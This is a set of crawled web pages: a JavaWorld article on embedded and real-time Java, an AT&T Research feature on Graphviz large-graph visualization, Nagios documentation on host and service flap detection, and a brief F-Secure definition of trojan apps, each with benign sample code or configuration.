Trojans that function on the Android operating system (OS) are typically repackaged or trojanized versions of useful or desirable programs (such as a popular game, system update or utility program). These trojans are often distributed using either the same name and branding as the original app or as similar programs, in order to deceive the user into installing the trojan.
Once the trojan is installed on the device, it silently performs its actual, unauthorized functions, which may range from harvesting personal data from the device, to sending premium SMS messages or intercepting SMS messages, connecting the device to a mobile botnet and so on. Examples of trojans with such capabilities include:
For more information about malware on the Android platform, see the latest Mobile Threat Reports . | <urn:uuid:091af36e-2cfd-410f-9ef9-bea494380267> | CC-MAIN-2017-04 | https://www.f-secure.com/v-descs/trojan_android.shtml | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280425.43/warc/CC-MAIN-20170116095120-00339-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.838009 | 212 | 2.609375 | 3 |
That there is a growing need for trained data scientists and other people with analytics skills is not a matter of debate. An important question is how to fill the need.
Since the educational system can respond slowly to skills needs in the technology workforce, training existing workers is emerging as a key option. Many corporations have taken it upon themselves to teach people data analytics skills.
No corporation is as ambitious in this regard as IBM. In March 2011, Big Blue launched a series of big data "boot camps" at various universities as well as IBM innovation centers and online. Five months later, IBM went all in, launching Big Data University (BDU) with help from partners such as Amazon, Jaspersoft, Rightscale, SciSpike and a growing list of other companies in the field.
Big Data University offers free online classes and certifications to all comers under the premise that teaching as many people as possible about big data and analytics could help not just businesses, but society.
“One of the things we were seeing was that the use cases now possible with big data can actually have an impact on human life,” explains IBM Big Data VP Anjul Bhambhri. “In health care we’ve seen big data be leveraged to predict the onset of an infection in a newborn baby 24 hours in advance, to be able to diagnose if there are symptoms that could lead to brain hemorrhage. When you see these kinds of possibilities, you don’t want people not adopting this technology and solving these problems for lack of education.”
A Global Classroom
So far more than 42,000 students from around the world have registered for the cloud-hosted classes for IBM’s program. Bhambhri says the largest numbers of students come from North America, India, China, Japan, Russia and Europe, even though classes are now offered only in English.
The courses are devised and run by volunteer members of the Hadoop, big data and database global communities who are employed by IBM and some of its BDU business partners. The classes fall into three basic categories: big data-related topics, database (DB2) related topics and miscellaneous topics.
The curriculum at BDU is flexible, with no prerequisites for courses. But there is a “suggested path” for students. For example, under the big data category, BDU lays out the following suggested course sequence:
1. Big data analytics demos (an overview of what big data is, why is matters, and its characteristics)
2. Hadoop Fundamentals I
3. Hadoop and the Amazon Cloud
4. Hadoop and the IBM Smartcloud Enterprise
5. Hadoop Fundamentals II
Students more interested in the analytics aspect of BDU are advised to start with No. 1 above before proceeding to:
2. Spreadsheet-like analytics
3. Text analytics essentials
4. Query languages for Hadoop
Each BDU course includes a test students can take following their studies. Students who pass can print out a certificate of completion.
How long a student takes to complete a course is pretty much up to them, as BDU emphasizes a “learn at your own pace” philosophy, though much depends on a student’s familiarity and experience with the topic matter, says Bhambhri.
“People who have a background in data mining or analytics, even though they may have done data mining and analytics for structured data, for them to expand their knowledge into the big data world would be fairly easy,” she says. Those people should be able to go through the curriculum in “a few weeks,” Bhambhri says.
Someone with “no background in data mining and analytics” might take at least a couple of months to absorb all the information in a curriculum category, she says.
However, some individual courses can be completed in as little as one day, Bhambhri says.
BDU may never have a football team, but it has a growing body of students and a mandate to spread knowledge that will help fill a daunting gap between the possibilities of big data technology and the skills necessary to leverage it.
As Bhambhri says, “The shortage of data scientists will never be overcome but by education.” | <urn:uuid:da29cb3f-12d5-410d-a05b-0b30b43ecfe8> | CC-MAIN-2017-04 | http://data-informed.com/ibms-big-data-university-address-analytics-skills-gap/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281492.97/warc/CC-MAIN-20170116095121-00063-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.954313 | 897 | 2.53125 | 3 |
RSA is an algorithm used in public key cryptography, and its discovery by Rivest, Shamir and Adleman (hence RSA) was a momentous development in the world of encryption. RSA is now used throughout the world as a way of encrypting data using a public key available to all and a secret private key kept by the person who wishes to decrypt the ciphertext.
The beauty of RSA is the use of a special function that enables the one-way mathematical treatment of plaintext data such that it can only be decrypted with the private key. In essence it is a one-way function with a trap door—the private key. The security of RSA rests on the difficulty of factorising large numbers: encrypting data with the public key takes only polynomial computing resources, while the best known methods for factorising the modulus require super-polynomial resources.
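The trapdoor is easy to see with textbook-sized numbers. The sketch below uses the classic toy parameters (p = 61, q = 53, e = 17) and omits padding entirely, so it illustrates only the mathematics, not a secure implementation:

```java
import java.math.BigInteger;

public class ToyRsa {
    public static void main(String[] args) {
        BigInteger p = BigInteger.valueOf(61), q = BigInteger.valueOf(53);
        BigInteger n = p.multiply(q);                         // 3233, public
        BigInteger phi = p.subtract(BigInteger.ONE)
                          .multiply(q.subtract(BigInteger.ONE)); // 3120
        BigInteger e = BigInteger.valueOf(17);                // public exponent
        BigInteger d = e.modInverse(phi);                     // 2753, private

        BigInteger m = BigInteger.valueOf(65);                // the plaintext
        BigInteger c = m.modPow(e, n);                        // m^e mod n
        BigInteger back = c.modPow(d, n);                     // c^d mod n

        System.out.println(c + " -> " + back);                // 2790 -> 65
        // Anyone can compute c from the public pair (e, n); recovering m
        // without d requires factoring n, which is trivial at this size
        // but infeasible for the moduli used in practice.
    }
}
```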
As computing power has increased, the available horsepower to brute force crack RSA algorithms has grown as well. The most recent announcement, in December 2009, was that a group of mathematicians, computer scientists and cryptographers had managed to factorise a 768-bit RSA key using a technique called the number field sieve or NFS. That puts the next milestone, the 1024-bit RSA key, in reach in the next decade or so.
In reality this may have been an interesting academic exercise, but current industry standards suggest that 1024-bit moduli shouldn't be used after 2010 anyway—standards put in place to address the foreseen increase in computing horsepower. Unless a really smart way is found to factorise numbers using some undiscovered mathematical technique, RSA key sizes will increase in line with the required encryption cover time, preserving the use of the RSA algorithm for the foreseeable future. Panic over.
As an aside what I found more amusing when reading the paper was this comment;
"...this required a bit more organizational efforts than expected, occasional recovery from mishaps such as unplugged network cables, switched off servers, or faulty raids, and a constantly growing farm of backup drives. We do not further comment on these more managerial issues in this article, but note that larger efforts of this sort would benefit from full-time professional supervision."
I must admit to sniggering at the image of these well respected academics tripping over cables and unplugging servers as the experiment went on, for want of adult supervision. Maybe more "Carry on Cryptography" than we realise. | <urn:uuid:5d1bbc93-a797-43fd-838f-92f6d0551aa4> | CC-MAIN-2017-04 | http://www.bloorresearch.com/analysis/encryption-gets-a-battering-part-2-rsa/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280133.2/warc/CC-MAIN-20170116095120-00275-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.943586 | 488 | 3.1875 | 3 |
As far as cloud service providers go, they will shift data around several locations depending on the cost factors and redundancy needed by the client. But in moving data across data centers all over the globe, these service providers also have to deal with privacy regulations and data residency laws. This becomes a critical area of reckoning when cloud service providers are processing data in locations which are known to have slightly less rigid laws as far as data protection goes. Cloud computing needs a flexible infrastructure but installing a data center in every data residency jurisdiction is not a practical solution.
When the movement of data is ruled by a large number of constraints, cloud services can become cost-prohibitive for clients. There is also the consideration of differing regulations when it comes to national security.
For instance, the USA has FISA and the USA Patriot Act which have the power to subpoena cloud service providers for information stored in their infrastructure.
| <urn:uuid:7a086666-c0ac-4b42-94ea-90a8aef0ad43> | CC-MAIN-2017-04 | http://www.datacenterjournal.com/data-residency-laws-govern-cloud-computing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00211-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.952845 | 184 | 2.53125 | 3 |
3.6.10 What are some other stream ciphers?
There are a number of alternative stream ciphers that have been proposed in cryptographic literature as well as a large number that appear in implementations and products world-wide. Many are based on the use of LFSRs (Linear Feedback Shift Registers; see Question 2.1.5), since such ciphers tend to be more amenable to analysis and it is easier to assess the security they offer.
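To illustrate the building block, here is a minimal Fibonacci LFSR: a 16-bit register with the taps of a well-known maximal-length polynomial (16, 14, 13, 11). It is a teaching sketch; a lone LFSR is linear and therefore trivially predictable, which is why practical stream ciphers filter or combine several registers nonlinearly:

```java
// Minimal 16-bit Fibonacci LFSR producing one keystream bit per clock.
// Keystream bytes are assembled from eight clocks and XORed with plaintext.
public class Lfsr {
    private int state;                       // 16 bits; must be nonzero

    Lfsr(int seed) { state = seed & 0xFFFF; }

    int nextBit() {
        // Taps at bits 16, 14, 13 and 11 of the register.
        int bit = (state ^ (state >> 2) ^ (state >> 3) ^ (state >> 5)) & 1;
        state = (state >> 1) | (bit << 15);
        return bit;
    }

    int nextByte() {
        int b = 0;
        for (int i = 0; i < 8; i++) b = (b << 1) | nextBit();
        return b;
    }

    public static void main(String[] args) {
        Lfsr keystream = new Lfsr(0xACE1);   // the seed plays the key's role
        int ciphertext = 'A' ^ keystream.nextByte();
        System.out.printf("0x%02X%n", ciphertext);
    }
}
```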
Rueppel suggests there are essentially four distinct approaches to stream cipher design [Rue92]. The first is termed the information-theoretic approach as exemplified by Shannon's analysis of the one-time pad. The second approach is that of system-theoretic design. In essence, the cryptographer designs the cipher along established guidelines that ensure the cipher is resistant to all known attacks. While there is, of course, no substantial guarantee that future cryptanalysis will be unsuccessful, it is this design approach that is perhaps the most common in cipher design. The third approach is to attempt to relate the difficulty of breaking the stream cipher (where "breaking" means being able to predict the unseen keystream with a success rate better than can be achieved by guessing) to solving some difficult problem (see [BM84] [BBS86]). This complexity-theoretic approach is very appealing, but in practice the ciphers developed tend to be rather slow and impractical. The final approach highlighted by Rueppel is that of designing a randomized cipher. Here the aim is to ensure the cipher is resistant to any practical amount of cryptanalytic work, rather than being secure against an unlimited amount of work, as was the aim with Shannon's information-theoretic approach.
A recent example of a stream cipher designed by a system-theoretic approach is the Software-optimized Encryption Algorithm (SEAL), which was designed by Rogaway and Coppersmith in 1993 [RC93] as a fast stream cipher for 32-bit machines. SEAL has a rather involved initialization phase during which a large set of tables is initialized using the Secure Hash Algorithm (see Question 3.6.5). However, the use of look-up tables during keystream generation helps to achieve a very fast performance with just five instructions required per byte of output generated.
A design that has system-theoretic as well as complexity-theoretic aspects is given by Aiello, Rajagopalan, and Venkatesan [ARV95]. The design, commonly referred to as "VRA," derives a fast stream cipher from an arbitrary secure block cipher. VRA is described as a pseudo-random generator (see Question 2.5.2), not a stream cipher, but the two concepts are closely connected, since a pseudo-random generator can produce a (pseudo) one-time pad for encryption.
For examples of ciphers in each of these categories, see Rueppel's article [Rue92] or any book on contemporary cryptography. More details are also provided in an RSA Laboratories technical report [Rob95a]. | <urn:uuid:08679719-3beb-491a-9a30-e3f79faed114> | CC-MAIN-2017-04 | https://www.emc.com/emc-plus/rsa-labs/standards-initiatives/other-stream-ciphers.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280239.54/warc/CC-MAIN-20170116095120-00119-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.964233 | 638 | 3.171875 | 3 |
It's all about having the right switch
A local area network (LAN) refers to an internal wired network at a particular location. PCs, servers, printers, and other network devices are networked via high-performance Gigabit switches. This is where security and reliability are an essential part of internal communication. LANCOM offers fully compatible hardware and software components for state-of-the-art network infrastructures. | <urn:uuid:67a40d4f-dd2f-4c0a-b186-ffc978edad90> | CC-MAIN-2017-04 | https://www.lancom-systems.com/solutions/network-connectivity/internal-networking/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280850.30/warc/CC-MAIN-20170116095120-00357-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.901276 | 85 | 2.6875 | 3 |
Most of us have heard about the concept of building a defense in depth in order to protect computer resources from black hat hackers. The idea revolves around the use of multiple defenses to thwart, or at least limit, the damage arising from a potential security breach.
Given the rapid pace of change in the security sector, some executives may have difficulty naming the specific safeguards that their companies deploy. This guide aims to shed some light on some of the more common aspects of computer security, and also serve as a checklist to identify potential areas upon which to improve.
1. Network firewall
The first line of defense against unwelcome visitors would surely be the firewall. At one point, the use of dual firewalls from different vendors was all the rage, though the creation of a DMZ (demilitarized zone) appears to be more popular these days. Internet-facing servers are typically placed within the DMZ, where they can accept inbound traffic under fewer restrictions than hosts on the internal corporate network, so that a compromise there does not directly expose internal systems.
There are actually a few different types of firewall implementations. For example, consumer-grade routers typically make use of Network Address Translation (NAT), which was originally created to address the problem of limited IPv4 routable addresses. Because the identity of hosts is obfuscated, NAT is often said to offer firewall capabilities.
At a minimum, a proper firewall typically offers packet filter technology, which allows or denies data packets based on established rules relating to the type of data packet and its source and destination address. Stateful packet filter firewalls conduct what is known as stateful packet inspection (SPI), which tracks active connections to sieve out spoofed packets, a superior approach to the stateless packet filtering firewall. Finally, a firewall operating on the application layer understands application-level protocols to identify sophisticated intrusion attempts.
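By way of illustration, the stateful model maps directly onto rules like the following, written for Linux's iptables (a common stateful packet filter; the choice of HTTPS as the allowed service is illustrative):

```
# Stateful packet filtering with iptables: default-deny inbound traffic,
# allow replies to established connections, allow new inbound HTTPS,
# and log whatever falls through to the default DROP policy.
iptables -P INPUT DROP
iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -m conntrack --ctstate NEW -j ACCEPT
iptables -A INPUT -j LOG --log-prefix "dropped: "
```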
A heightened security awareness and an increase in ecommerce have led more users than ever to use encryption to protect against third-party snooping. Paradoxically, this has resulted in lower visibility of network traffic at a time when more sophisticated malware varieties are resorting to encryption in order to conceal themselves from a casual inspection.
2. Virtual Private Network
Employees who need to access company resources from unsecured locations such as public Wi-Fi hotspots are a particularly vulnerable group. Such workers will be well served by a virtual private network (VPN) connection in order to protect the confidentiality of their network access. A VPN channels all network traffic through an encrypted tunnel back to the trusted corporate network.
As a downside, a VPN can be complex for a small business to deploy, and is costly to support due to the overheads of authentication, processing and bandwidth. Moreover, it is also vulnerable to the theft of physical authentication tokens -- or authentication technology, as was the case with the compromise of RSA's SecurID technology last year. Finally, stolen and lost company laptops with preconfigured VPN settings can become potential gateways for unauthorized access.
3. IDS and IPS
An intrusion detection system (IDS) is a network-centric strategy that involves monitoring traffic for suspicious activities that may indicate that the corporate network has been compromised. On its simplest level, this may entail the detection of port scans originating from within the network or excessive attempts to log into a server. The former could be indicative of a compromised host being used to perform initial reconnaissance, while the latter could well be a brute-force attempt in progress. On more advanced network switches, IDS monitoring of network traffic may be enabled by port mirroring, or via the use of passive network taps.
An intrusion prevention system (IPS), by contrast, is usually deployed in-line in order to actively prevent or block intrusions as they are detected. A specific IP address could be automatically blocked off, with an alarm sent to an administrator.
4. Malware Detection
The cat-and-mouse game of malware detection is very much a linchpin of the $22.9 billion enterprise security software market projected for 2012. Malware scanning performed on client devices relies on the processing capabilities of individual devices to check for threats. Business-centric versions typically include some form of central management used to push out new definition updates and implement simple security policies. Malware products specifically optimized for servers are also available, though they are not particularly popular, as businesses are understandably loathe to deploy anything that saps the processing cycles of expensive server hardware.
Given that most malware infestations are a direct result of a user action, the typical anti-malware package has also evolved into comprehensive suites that attempt to offer protection against multiple threat vectors. This may include a component to scrutinize a URL link prior to launching it, or email and browser plug-ins that do the same to file attachments. In addition, anti-malware suites are increasingly bundled with a software-based firewall, spyware detection and even spam filtering.
5. Whitelisting
Whitelisting is an anti-malware defense implemented on client devices much like traditional antivirus software. Instead of attempting to identify known malware, however, whitelisting only allows known files to be executed. This necessitates an initial baseline scan to construct a database of whitelisted applications, to which new applications can be added over time as they are installed.
Though promising, whitelisting has been plagued by various practical problems that have hindered its adoption in businesses. Situations may arise, for example, in which critical file dependencies were not properly identified, resulting in application crashes or an improper installation, as they were prevented from loading. Also, whitelisting may be less useful against exploits that leverage the use of specially created documents or other non-executable files. Finally, employees who are in a hurry may simply disregard warnings and opt to add everything, including malware, into their whitelist.
To be fair, whitelisting software has seen tremendous improvements over the years. Today, most whitelisting software will recognize commonly used applications upon installation and can hence build an initial whitelist very quickly with minimal interaction from users. It is important to ask whether whitelisting software can coexist with traditional antivirus software. The answer varies, though some whitelisting products do advertise their compatibility with antivirus applications.
6. Spam Filtering
Though spam is not traditionally considered within the domain of computer security, the lines are getting blurred given the increasing number of spear phishing attacks used by hackers to sneak Trojan or zero-day malware into corporate workstations. In addition, there is also evidence to suggest that users who deal with a high volume of emails are more susceptible to being taken in by a phishing attempt. It is clearly in the interest of the IT department to filter out as many bogus email messages as possible.
There are many ways to deal with spam, which may entail channeling all incoming email messages through a specialized cloud service provider, a server-based spam filtering software, or dedicated anti-spam appliances deployed within the DMZ.
7. Keeping Software up to Date
Ensuring that software updates and security patches are kept up to date is widely acknowledged to be an important defense against security breaches. The reason is simple. Though vendors do not typically release the full details of new security flaws, the proffered guidelines and the release of the security patches are often sufficient for black hats to reverse engineer a particular vulnerability. Depending on the nature of the security flaw that is identified, an exploit could potentially be written in days.
This becomes a problem in larger SMBs, which may make use of a wide range of software applications or in-house tools that depend on various third-party tools or codebases. It is hence not uncommon for new software updates or security patches to be overlooked, thus opening up a window of vulnerability. The increasing variety of software that is capable of updating itself over the Internet may somewhat alleviate this problem. However, it should be noted that automatic updating may not be desirable in mission-critical production environments. To that end, businesses need to implement appropriate processes to identify and test new updates in a timely manner.
8. Physical security
Physical security is a crucial factor that cannot be overstated. After all, given physical access, practically every security or network appliance can be reset to its factory default. In addition, unsecured Ethernet ports may also offer a direct line past the firewall and other perimeter defenses, though that access can be mitigated to an extent with managed switches configured to deny access to unrecognized MAC addresses. Another concern within server rooms is the theft of hard disk drives from hot-swappable bays of storage appliances or servers. Given how password files can be deciphered relatively easily from stolen storage devices, server closets or server rooms should be kept locked at all times, and access granted only to authorized staffers.
We have only touched on some of the most common aspects of security deployments. There are obviously many others, such as the importance of user education, independent security audits and the value of a good IT policy. The presence of comprehensive logging and auditing will also help greatly in identifying sources of a breach.
The important point here is that security is a multi-faceted topic that is constantly evolving. Small and mid-sized businesses need to ensure that they do not rely on a single mechanism to stay secure, and that they stay up to date on the latest security offerings available.
Paul Mah is a freelance writer and blogger who lives in Singapore. You can reach Paul at firstname.lastname@example.org and follow him on Twitter at @paulmah. | <urn:uuid:99a75337-887d-4dfb-8bd8-157e953d5597> | CC-MAIN-2017-04 | http://www.cio.com/article/2399075/security0/how-to-build-multiple-layers-of-security-for-your-small-business.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281263.12/warc/CC-MAIN-20170116095121-00265-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.94764 | 1,943 | 2.84375 | 3 |
NIST Proposes Tracking Cyber Attacks Via Web Services
Software could track and then reconstruct cyber attacks carried out against web services to help organizations understand their vulnerabilities, according to scientists with the National Institute of Standards and Technology.
Developers could build a framework that maintains transactional records among web services in order to recreate the scene of the crime in the aftermath of a cyber attack, scientists from the National Institute of Standards and Technology suggest in a new study.
More specifically, the researchers propose designing web services, which they label Forensic Web Services, that preserve evidence of attacks and then, using that data, reconstruct series of web service invocations that took place during the course of the attacks.
The system, the report's authors say, could work with any web services based on XML, Simple Object Access Protocol (SOAP) and related open standards.
The service would record transactions -- whenever they are invoked -- between pairs of services, and piece them together into pictures of the complex transactional scenarios that occurred during specific time periods, such as during an attack. The transaction records would be encrypted to maintain a level of security.
In order to work, and for the records to be admissible as legal evidence, Forensic Web Services would need to be integrated with other web services, acting as a trusted, independent third-party service. The data generated by the service's observation of transactions could be provided directly to forensic examiners and to customers of the Forensic Web Service whose own web services were attacked.
With data in hand, examiners and victims could track down the insecure culprit, whether it was one of their own services or a third party. In addition, the researchers suggest, detailed evidence of malicious activity could impact the severity of punishment ultimately handed down to the culprits because the records would likely be used in court. | <urn:uuid:67422167-d679-4e07-a4aa-8fba77cbdf84> | CC-MAIN-2017-04 | http://www.darkreading.com/risk-management/nist-proposes-tracking-cyber-attacks-via-web-services/d/d-id/1090775 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00477-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.953811 | 364 | 2.703125 | 3 |
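The article stops short of implementation detail, but the core idea (tamper-evident, pairwise transaction records held by a trusted third party) can be sketched. The Python fragment below is illustrative only; the key handling, service names, and record format are assumptions, not NIST's design:

import hashlib
import hmac
import json
import time

SECRET = b"key-held-by-the-trusted-third-party"  # hypothetical shared key

def record_invocation(log, caller, callee, soap_payload):
    # Append a tamper-evident record of one web service invocation.
    # Store a hash of the SOAP payload rather than the payload itself,
    # and chain each record to the previous record's MAC so deletions
    # or reordering after an attack become detectable.
    entry = {
        "ts": time.time(),
        "caller": caller,
        "callee": callee,
        "payload_sha256": hashlib.sha256(soap_payload).hexdigest(),
        "prev_mac": log[-1]["mac"] if log else "",
    }
    body = json.dumps(entry, sort_keys=True).encode()
    entry["mac"] = hmac.new(SECRET, body, "sha256").hexdigest()
    log.append(entry)
    return entry

log = []
record_invocation(log, "orders.example.com", "billing.example.com",
                  b"<soap:Envelope>...</soap:Envelope>")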
On July 27, the National Oceanic and Atmospheric Administration (NOAA) will begin monitoring space weather.
NOAA plans to launch the Deep Space Climate Observatory (DSCOVR), a satellite equipped with a Faraday Cup plasma sensor and a magnetometer, instruments that measure the severity of space weather storms. The satellite will collect more accurate space weather data than previous technology has offered.
According to a recent news release from the U.S. Department of Commerce website, DSCOVR will be able to inform forecasters of geomagnetic storm warnings that could affect Earth. The satellite’s Faraday Cup plasma sensor measures the speed, density, and temperature of solar wind, while its magnetometer gauges the strength and direction of the solar wind magnetic field.
DSCOVR, NOAA’s first space weather satellite, will offer improved measurements and higher quality data that will alert weather experts of space storms approaching Earth. Although the sun is 93 million miles away, its weather activity can affect technological operations on Earth.
“Severe space weather can disrupt power grids, marine and aviation navigation, satellite operations, GPS systems and communication technologies,” said Tom Berger, director of NOAA’s Space Weather Prediction Center. “DSCOVR will allow us to deliver more timely, accurate, and actionable geomagnetic storm warnings, giving people time to prevent damage and disruption of important technological systems.”
DSCOVR’s data will allow forecasters to know up to an hour before a surge of particles created by solar storms hit Earth. Members of the public will be able to view this data as it is released online. The 47,000 people who subscribe to the Space Weather Prediction Center (SWPC) listserv will receive DSCOVR’s data and forecasts over email. | <urn:uuid:25478579-03f6-4c97-9830-79366bc95a31> | CC-MAIN-2017-04 | https://www.meritalk.com/articles/noaas-new-satellite-gathers-better-data-on-space-storms/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00477-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.913448 | 371 | 3.40625 | 3 |
Correlation rules are written to match specific events or sequences of events by using field references, comparison and match operators on the field contents, and operations on sets of events.
The Correlation Engine loads the rule definition and uses the rules to evaluate, filter, and store events in memory that meet the criteria specified by the rule. Depending on the rule definition, a correlation rule might fire according to several different criteria:
The value of one field or multiple fields
The comparison of an incoming event to past events
The number of occurrences of similar events within a defined time period
One or more subrules firing
One or more subrules firing in a particular order
This section provides a basic overview of how to build Correlation rules and the various parameters required to build a rule. | <urn:uuid:09397bc0-2b2c-4a9f-bf5b-ca94f28418ba> | CC-MAIN-2017-04 | https://www.netiq.com/documentation/sentinel70/s701_user/data/bgrabb4.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00477-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.895563 | 157 | 2.921875 | 3 |
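As a rough illustration of the time-window criteria above, here is a minimal sketch in Python of a rule that fires when enough matching events arrive within a defined period. It is not Sentinel's actual rule language; the event format and field names are invented:

from collections import deque

class ThresholdRule:
    # Fire when `count` events matching `criteria` occur within `window` seconds.
    def __init__(self, criteria, count, window):
        self.criteria = criteria  # dict: field name -> required value
        self.count = count
        self.window = window
        self.hits = deque()       # timestamps of matching events

    def evaluate(self, event):
        # Filter on field values first, as a real subrule would.
        if any(event.get(f) != v for f, v in self.criteria.items()):
            return False
        now = event["ts"]
        self.hits.append(now)
        while self.hits and now - self.hits[0] > self.window:
            self.hits.popleft()   # drop matches that aged out of the window
        return len(self.hits) >= self.count  # True means the rule fires

rule = ThresholdRule({"name": "AuthFailed", "src_ip": "10.0.0.7"}, count=5, window=60)
for t in range(5):
    fired = rule.evaluate({"name": "AuthFailed", "src_ip": "10.0.0.7", "ts": 1000 + t})
print(fired)  # True on the fifth matching event within the window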
OK, about a third of the way through this video I got lost, but if you're really into science stuff that seems cool, check out this video. Stanford University has posted an interview with Alfred Spormann, a professor of chemical engineering and of civil and environmental engineering at Stanford, discussing a project where they are using microbes that can turn electrical energy into pure methane.
An article explains a bit more:
"Researchers at both campuses are raising colonies of microorganisms, called methanogens, which have the remarkable ability to turn electrical energy into pure methane – the key ingredient in natural gas. The scientists' goal is to create large microbial factories that will transform clean electricity from solar, wind or nuclear power into renewable methane fuel and other valuable chemical compounds for industry."
The best part? Scientists from Pennsylvania State University are also assisting in this project, and we all know that it could help to have some good news coming out of that school.
Keith Shaw rounds up the best in geek video in his ITworld.tv blog.
The nuts and bolts of DNSsec
- By William Jackson
- Jul 25, 2008
The Domain Name System helps make a ubiquitous, global Internet practical by providing an infrastructure for mapping labels such as URLs and e-mail addresses to numerical IP addresses. Understandable addresses that can be remembered and convey information about the addressee, such as www.gcn.com, provide a friendly user interface for the Internet.
The original DNS specifications were finalized by 1983 in Internet Engineering Task Force RFC 882 and RFC 883. These have since been revised and replaced. Four Berkeley students created the first Unix implementation of DNS in 1984, which became the Berkeley Internet Name Domain (BIND) in 1985. This has become one of the most widely deployed name servers.
The DNS Security Extensions (DNSsec) are a response to vulnerabilities in DNS that make it possible for hackers to provide false information in response to a request, thus misinforming and misdirecting a client. The initial specification was published in 1997 and was replaced in 1999 with IETF RFC 2535. Further refinements have since been added.
With DNSsec, answers to requests are digitally signed to protect clients from forged DNS data. It provides:
- Origin authentication of DNS data.
- Data integrity.
- Authenticated denial of existence for an address that cannot be found.
Although digitally signed responses can be authenticated, they are not encrypted, and DNSsec does not provide confidentiality for the data.
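As a quick illustration, a client can at least check whether its validating resolver authenticated an answer by setting the DNSSEC OK (DO) bit and inspecting the Authenticated Data (AD) flag in the reply. A sketch using the dnspython library (the resolver address and query name are just examples):

import dns.flags
import dns.resolver  # pip install dnspython

resolver = dns.resolver.Resolver()
resolver.nameservers = ["8.8.8.8"]        # must be a validating resolver
resolver.use_edns(0, dns.flags.DO, 1232)  # request DNSSEC processing

answer = resolver.resolve("ietf.org", "A")
# AD set means the resolver validated the signature chain. Note this trusts
# the resolver and the path to it; DNSsec gives authentication, not secrecy.
print("validated:", bool(answer.response.flags & dns.flags.AD))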
William Jackson is a Maryland-based freelance writer. | <urn:uuid:12a50912-de75-4a68-8cc7-27159b79c43d> | CC-MAIN-2017-04 | https://gcn.com/Articles/2008/07/25/The-nuts-and-bolts-of-DNSsec.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284405.58/warc/CC-MAIN-20170116095124-00503-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.926631 | 309 | 3.390625 | 3 |
This section describes how to convert the previously discussed packed-decimal formats into text strings to print or display the information in a human readable form. Before converting the packed-decimal fields it should be determined if a conversion is necessary. The following list provides some basic guidelines.
1. When migrating an application (both data and COBOL programs for processing the data) from an IBM Mainframe to a Micro Focus and Windows environment a conversion is not necessary. Micro Focus COBOL supports the packed-decimal format.
2. When migrating an application (both data and COBOL programs for processing the data) from an IBM Mainframe to a Micro Focus and UNIX environment a conversion is not necessary. Micro Focus COBOL supports the packed-decimal format.
3. When migrating or transferring data from a COBOL-oriented IBM Mainframe or AS/400 environment to a non-COBOL-oriented (Windows or UNIX) environment (i.e., ASCII/text or an Excel spreadsheet), a conversion will be required. This may require two conversion tasks. The packed-decimal fields (or data strings) will need to be converted to a zoned-decimal format (sign leading separate, with an explicit decimal point, should be considered depending on the target environment). The zoned-decimal data may then require a conversion from EBCDIC to ASCII (see the sketch after this list).
4. When using the File Transfer Protocol (FTP) to transfer a data file between a mainframe and a Windows or UNIX environment it will be necessary to use the BINARY mode if the records contain packed-decimal fields. If a conversion between EBCDIC and ASCII is required it will need to be done after the transfer.
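When a conversion is required (cases 3 and 4 above), the unpacking itself is mechanical: each byte holds two binary-coded-decimal digits, and the low-order nibble of the last byte holds the sign. A minimal sketch in Python, assuming the usual sign nibbles (0xC/0xF positive, 0xD negative):

def unpack_comp3(raw: bytes, scale: int = 0) -> str:
    # Convert a packed-decimal (COMP-3) field to a display string.
    nibbles = []
    for b in raw:
        nibbles.extend((b >> 4, b & 0x0F))
    sign_nibble = nibbles.pop()          # the last nibble is the sign
    if any(n > 9 for n in nibbles):
        raise ValueError("not a valid packed-decimal field")
    sign = "-" if sign_nibble == 0x0D else ""
    digits = "".join(map(str, nibbles)).lstrip("0") or "0"
    if scale:                            # insert the implied decimal point
        digits = digits.rjust(scale + 1, "0")
        digits = digits[:-scale] + "." + digits[-scale:]
    return sign + digits

# PIC S9(3)V99 COMP-3 value 0x12345C -> "123.45"
assert unpack_comp3(bytes([0x12, 0x34, 0x5C]), scale=2) == "123.45"

Surrounding zoned-decimal text can then be translated with a code-page decode such as raw.decode("cp037") for EBCDIC to ASCII/Unicode.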
The "move" command does not convert types. Use the assignment statement instead. Assign a numeric variable to the packed variable then assign the character variable to the numeric. Note for the numeric variable if the number of decimal places is zero still do not leave this off. | <urn:uuid:699c05f4-1a52-4d6b-9d54-45e964c0bf35> | CC-MAIN-2017-04 | http://ibmmainframes.com/about31720.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280308.24/warc/CC-MAIN-20170116095120-00229-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.749652 | 425 | 3.078125 | 3 |
Have you ever plugged a sentence into machine translation software and received a result so bad it blew your mind? The Bad Translator app can generate a perfect example of what can happen to a sentence when you run it through too many translations. I tried it out by inputting:
“I'd rather not deal with poorly translated sentences.”
